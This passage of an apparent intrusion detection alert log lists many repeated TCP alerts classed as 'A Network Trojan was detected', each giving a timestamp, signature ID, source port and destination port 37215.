                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.934351
                  SID:2829579
                  Source Port:43832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.500844
                  SID:2835222
                  Source Port:56934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.625693
                  SID:2835222
                  Source Port:33138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2835222
                  Source Port:53656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.215943
                  SID:2829579
                  Source Port:56428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.238531
                  SID:2829579
                  Source Port:53508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.076918
                  SID:2829579
                  Source Port:41266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735455
                  SID:2829579
                  Source Port:52586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265032
                  SID:2829579
                  Source Port:60580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.719591
                  SID:2829579
                  Source Port:34822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.743244
                  SID:2829579
                  Source Port:34478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.124721
                  SID:2829579
                  Source Port:46706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.038406
                  SID:2829579
                  Source Port:47272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879424
                  SID:2829579
                  Source Port:37528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.817367
                  SID:2829579
                  Source Port:44714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300900
                  SID:2835222
                  Source Port:46290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525521
                  SID:2829579
                  Source Port:37858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.804440
                  SID:2829579
                  Source Port:57030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275564
                  SID:2835222
                  Source Port:34464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174568
                  SID:2835222
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.912875
                  SID:2829579
                  Source Port:53572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442575
                  SID:2835222
                  Source Port:49330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.762574
                  SID:2835222
                  Source Port:50320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.457605
                  SID:2835222
                  Source Port:60360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312425
                  SID:2829579
                  Source Port:33118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.289517
                  SID:2829579
                  Source Port:53466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298616
                  SID:2835222
                  Source Port:59610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.949605
                  SID:2829579
                  Source Port:53562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.466916
                  SID:2829579
                  Source Port:56006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.496514
                  SID:2829579
                  Source Port:35810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.894598
                  SID:2829579
                  Source Port:37400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.985380
                  SID:2829579
                  Source Port:48572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.970301
                  SID:2835222
                  Source Port:50754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393552
                  SID:2835222
                  Source Port:38870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.980540
                  SID:2829579
                  Source Port:47504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.911358
                  SID:2829579
                  Source Port:36410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517439
                  SID:2829579
                  Source Port:36848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.928816
                  SID:2835222
                  Source Port:33514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.303062
                  SID:2835222
                  Source Port:39400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.011649
                  SID:2835222
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.803775
                  SID:2829579
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632992
                  SID:2829579
                  Source Port:48232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.684476
                  SID:2829579
                  Source Port:48246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323465
                  SID:2835222
                  Source Port:44088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.017676
                  SID:2835222
                  Source Port:36778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.454904
                  SID:2835222
                  Source Port:40948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2829579
                  Source Port:50386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.860348
                  SID:2835222
                  Source Port:54060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.566038
                  SID:2835222
                  Source Port:58642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:37804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.058899
                  SID:2829579
                  Source Port:43728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169608
                  SID:2829579
                  Source Port:58324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.809017
                  SID:2835222
                  Source Port:39404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.296464
                  SID:2835222
                  Source Port:49012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.109836
                  SID:2829579
                  Source Port:36212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.190531
                  SID:2835222
                  Source Port:50528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.178441
                  SID:2835222
                  Source Port:43178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357123
                  SID:2835222
                  Source Port:59682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910396
                  SID:2829579
                  Source Port:53598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.638675
                  SID:2835222
                  Source Port:49878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860242
                  SID:2835222
                  Source Port:50034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.768377
                  SID:2835222
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.822867
                  SID:2829579
                  Source Port:52874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.588104
                  SID:2835222
                  Source Port:47728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.987443
                  SID:2835222
                  Source Port:33382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271141
                  SID:2829579
                  Source Port:35100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.743093
                  SID:2835222
                  Source Port:48940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.549357
                  SID:2835222
                  Source Port:58656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.234449
                  SID:2829579
                  Source Port:51324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848848
                  SID:2829579
                  Source Port:37622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.588243
                  SID:2829579
                  Source Port:48468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.352801
                  SID:2829579
                  Source Port:48514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647460
                  SID:2829579
                  Source Port:36764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479319
                  SID:2829579
                  Source Port:36182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.207255
                  SID:2829579
                  Source Port:44908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.077820
                  SID:2835222
                  Source Port:54318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.100139
                  SID:2835222
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.982789
                  SID:2829579
                  Source Port:47886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.131981
                  SID:2835222
                  Source Port:47302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.674109
                  SID:2829579
                  Source Port:37164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463708
                  SID:2835222
                  Source Port:44910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.160645
                  SID:2829579
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.730501
                  SID:2835222
                  Source Port:33178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.810296
                  SID:2835222
                  Source Port:57096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.871003
                  SID:2829579
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.891994
                  SID:2835222
                  Source Port:59532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624434
                  SID:2829579
                  Source Port:35066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460013
                  SID:2829579
                  Source Port:46828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759189
                  SID:2829579
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922579
                  SID:2835222
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805292
                  SID:2829579
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2835222
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362025
                  SID:2835222
                  Source Port:37178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.119268
                  SID:2829579
                  Source Port:49948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.547528
                  SID:2835222
                  Source Port:46082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389862
                  SID:2829579
                  Source Port:49996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483552
                  SID:2829579
                  Source Port:44876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2835222
                  Source Port:50320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949781
                  SID:2829579
                  Source Port:40956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.728876
                  SID:2829579
                  Source Port:45998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918054
                  SID:2835222
                  Source Port:45864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.227132
                  SID:2835222
                  Source Port:33556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2835222
                  Source Port:58596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.085141
                  SID:2829579
                  Source Port:59866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.900792
                  SID:2835222
                  Source Port:57990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.553741
                  SID:2829579
                  Source Port:33094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2835222
                  Source Port:49692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2835222
                  Source Port:43216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883243
                  SID:2835222
                  Source Port:51590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.595763
                  SID:2835222
                  Source Port:41682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.154911
                  SID:2835222
                  Source Port:33538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.287695
                  SID:2835222
                  Source Port:36970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.111438
                  SID:2829579
                  Source Port:57142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.425119
                  SID:2829579
                  Source Port:47392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861414
                  SID:2829579
                  Source Port:54278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921267
                  SID:2829579
                  Source Port:59376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.833668
                  SID:2829579
                  Source Port:38676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.578082
                  SID:2835222
                  Source Port:35064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.146990
                  SID:2829579
                  Source Port:39424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.564207
                  SID:2829579
                  Source Port:33628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483995
                  SID:2829579
                  Source Port:44478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.966709
                  SID:2835222
                  Source Port:59708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.486586
                  SID:2835222
                  Source Port:57388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.525491
                  SID:2829579
                  Source Port:54082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.289116
                  SID:2835222
                  Source Port:44092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.160922
                  SID:2835222
                  Source Port:34206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.757502
                  SID:2829579
                  Source Port:60080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.282897
                  SID:2835222
                  Source Port:53872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936738
                  SID:2829579
                  Source Port:39868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.518988
                  SID:2829579
                  Source Port:57224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.507249
                  SID:2829579
                  Source Port:43170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.050359
                  SID:2829579
                  Source Port:50830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320744
                  SID:2829579
                  Source Port:57064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343044
                  SID:2835222
                  Source Port:53584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2829579
                  Source Port:40120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.501792
                  SID:2835222
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2829579
                  Source Port:56822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.830052
                  SID:2829579
                  Source Port:41658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.015803
                  SID:2835222
                  Source Port:53496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.827128
                  SID:2829579
                  Source Port:33388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867031
                  SID:2835222
                  Source Port:53332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351340
                  SID:2829579
                  Source Port:37228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.977821
                  SID:2835222
                  Source Port:45496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.826099
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2829579
                  Source Port:50148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.848965
                  SID:2835222
                  Source Port:39922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.001475
                  SID:2835222
                  Source Port:43536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980422
                  SID:2835222
                  Source Port:34788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.964289
                  SID:2829579
                  Source Port:44054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655198
                  SID:2829579
                  Source Port:58322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984415
                  SID:2829579
                  Source Port:53520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.360026
                  SID:2829579
                  Source Port:47644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.234679
                  SID:2829579
                  Source Port:53668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.238530
                  SID:2829579
                  Source Port:37698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.723492
                  SID:2835222
                  Source Port:58440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168869
                  SID:2829579
                  Source Port:33712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625534
                  SID:2829579
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:52674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196172
                  SID:2835222
                  Source Port:51786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2829579
                  Source Port:41542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.912574
                  SID:2835222
                  Source Port:54874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442446
                  SID:2829579
                  Source Port:59092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.002542
                  SID:2829579
                  Source Port:40648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.382774
                  SID:2829579
                  Source Port:60506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883547
                  SID:2835222
                  Source Port:33664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.349676
                  SID:2835222
                  Source Port:41904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156070
                  SID:2835222
                  Source Port:51454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460013
                  SID:2829579
                  Source Port:42878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136421
                  SID:2835222
                  Source Port:34994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.615141
                  SID:2829579
                  Source Port:59854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.810872
                  SID:2835222
                  Source Port:48630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.178484
                  SID:2829579
                  Source Port:56852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2829579
                  Source Port:41560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532382
                  SID:2835222
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499192
                  SID:2829579
                  Source Port:48108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.001228
                  SID:2835222
                  Source Port:51546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.849464
                  SID:2829579
                  Source Port:51742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2835222
                  Source Port:42160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.865886
                  SID:2829579
                  Source Port:60368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.820169
                  SID:2835222
                  Source Port:53314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751159
                  SID:2835222
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.822252
                  SID:2835222
                  Source Port:39846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:35450
